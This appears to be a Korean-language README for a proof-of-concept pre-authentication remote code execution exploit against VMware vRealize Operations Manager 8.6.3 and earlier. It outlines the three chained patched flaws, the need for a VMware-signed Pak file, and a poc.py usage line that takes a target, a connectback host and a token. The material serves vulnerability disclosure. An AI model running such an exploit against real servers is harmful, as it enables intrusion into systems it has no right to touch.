
이는 VMware vRealize Operations Manager용 사전 인증 RCE 익스플로잇입니다.
이것은 VMware vRealize Operations Manager(vROPS)용 사전 인증 RCE 익스플로잇으로, 버전 <= 8.6.3.19682901에 영향을 미칩니다.
Qihoo 360 취약점 연구소의 Steven Seeley
이 익스플로잇은 vRealize-Operations-Manager-Appliance-8.6.3.19682901_OVF10.ova 파일(SHA1: 4637b6385db4fbee6b1150605087197f8d03ba00)을 사용하여 8.6.3.19682901에 대해 테스트되었지만, 다른 이전 버전에서도 작동하는 것으로 알려져 있습니다.
이 익스플로잇은 패치된 세 가지 취약점을 연쇄적으로 사용합니다. 자세한 내용은 블로그 게시물에서 확인할 수 있습니다:
이 익스플로잇은 공격자가 다음을 제공해야 합니다:
APUAT-8.5.0.18176777.pak와 같이 VMWare가 서명한 유효한 Pak 파일.이 익스플로잇은 많은 부분이 맞물려 있습니다. 첫 시도에 작동하도록 제가 제대로 설계했기를 바랍니다.
이 익스플로잇은 완료하는 데 평균 약 1m34.142s가 걸립니다(5회 테스트). 더 빠르게 만들기 위해 노력했지만, 대회를 위해 할당된 시간 안에 들어갑니다 ;->
researcher@mars:~$ ./poc.py
(+) usage: ./poc.py <target> <connectback> <dashboardlink_token>
(+) eg: ./poc.py 192.168.2.196 192.168.2.234 uuncuybis9
